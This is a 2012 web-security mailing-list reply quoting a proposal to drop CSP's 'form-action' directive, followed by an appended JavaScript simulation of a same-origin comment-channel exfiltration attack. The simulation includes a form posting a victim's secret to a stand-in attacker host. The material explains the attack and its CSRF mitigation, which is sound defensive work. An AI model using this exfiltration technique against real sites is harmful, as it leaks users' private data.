public-web-security is the mailing list for the general security interest group. Discussions about CSP should take place on public-webappsec. Would you be willing to re-send your message to that list? Thanks!

Adam

On Thu, Jun 7, 2012 at 8:05 PM, Eric Chen <eric.chen@sv.cmu.edu> wrote:
> Hello Everyone:
>
> I would like to propose the removal of the 'form-action' directive from CSP 1.1
> because it offers very few security guarantees against data exfiltration
> attacks. We wrote a paper on this particular
> topic: http://www.w2spconf.com/2012/papers/w2sp12-final11.pdf
>
> In summary, the attack works as follows:
> 1. Alice has a blog that uses the 'form-action' directive to protect data
> from being sent to evil.com
> 2. The attacker creates a form that posts the user's data to the comment
> section of a blog post.
> 3. The attacker reads the blog post to extract the data
>
> We discovered that 40% of the Alexa top 1xx websites contain at least one
> exfiltration channel without CSRF protection, which makes them susceptible
> to this attack (yes, even with JavaScript disabled).
>
> --
> -Eric

Received on Friday, 8 June 2012 19:13:53 GMT
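The three-step attack Eric quotes above, simulated end to end as an added example (this is not code from the thread, from the W2SP paper, or from any CSP implementation). The blog origin, the /comment endpoint, the victim data and the CSRF token value are constructed for illustration. The point it makes concrete: `form-action 'self'` blocks the direct post to evil.com, but the same policy must allow a post to the blog's own comment endpoint, so an attacker-controlled form targeting that endpoint carries the data out just as well, until the endpoint demands a CSRF token the attacker cannot supply.

```javascript
// Added example: simulates CSP form-action enforcement and the same-origin
// exfiltration channel described in the thread. All names are constructed.
const BLOG_ORIGIN = "https://blog.example"; // assumed origin of Alice's blog

// Minimal form-action source matcher: handles 'none', 'self' and origin literals.
// Real CSP matching has more cases (schemes, wildcards); this is enough here.
function formActionAllows(policy, pageOrigin, targetUrl) {
  const target = new URL(targetUrl).origin;
  return policy.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target === pageOrigin;
    return new URL(src).origin === target;
  });
}

// Toy blog backend. The comment endpoint is the "exfiltration channel":
// anyone can write to it, and anyone can read what was written.
function makeBlog({ csrfProtected }) {
  const comments = [];
  const sessionToken = "tok-3f9a"; // constructed; a real token is per-session and unguessable
  return {
    origin: BLOG_ORIGIN,
    csrfToken: sessionToken,
    handlePost(path, body) {
      if (path !== "/comment") return { status: 404 };
      // CSRF check: the attacker's injected form does not carry the token
      // (the check only helps if the token itself cannot be leaked the same way).
      if (csrfProtected && body.csrf !== sessionToken) return { status: 403 };
      comments.push(body.text);
      return { status: 200 };
    },
    // Step 3 of the attack: comments are public, so the attacker reads them back.
    readComments() { return comments.slice(); },
  };
}

// The browser side: enforce form-action for the page's policy, then deliver the post.
function submitForm(policy, pageOrigin, form, blog) {
  if (!formActionAllows(policy, pageOrigin, form.action)) {
    return { blocked: true, status: null };
  }
  const url = new URL(form.action);
  if (url.origin !== blog.origin) return { blocked: false, status: 0 }; // never reaches the blog
  return { blocked: false, status: blog.handlePost(url.pathname, form.fields).status };
}

// Runs the whole scenario once, with or without CSRF protection on /comment.
function runAttack({ csrfProtected }) {
  const blog = makeBlog({ csrfProtected });
  const policy = ["'self'"]; // Content-Security-Policy: form-action 'self'
  const secret = "victim's private draft"; // constructed data the attacker wants

  // Step 1: a form aimed straight at evil.com is blocked by form-action.
  const direct = submitForm(policy, blog.origin,
    { action: "https://evil.example/collect", fields: { text: secret } }, blog);

  // Step 2: an attacker-controlled form posts the same data to the blog's own
  // comment endpoint; 'self' permits it, so CSP offers no help here.
  const viaComment = submitForm(policy, blog.origin,
    { action: BLOG_ORIGIN + "/comment", fields: { text: secret } }, blog);

  // Step 3: the attacker reads the public comment and recovers the data.
  const leaked = blog.readComments().includes(secret);

  return { directBlocked: direct.blocked, commentStatus: viaComment.status, leaked };
}

module.exports = { formActionAllows, makeBlog, submitForm, runAttack };
```

Run it with `node` and call `runAttack({ csrfProtected: false })`: the direct post is blocked, the comment post returns 200 and `leaked` is true. With `csrfProtected: true` the comment post returns 403 and nothing leaks, which is exactly the distinction Eric's "channels without CSRF protection" figure is drawing.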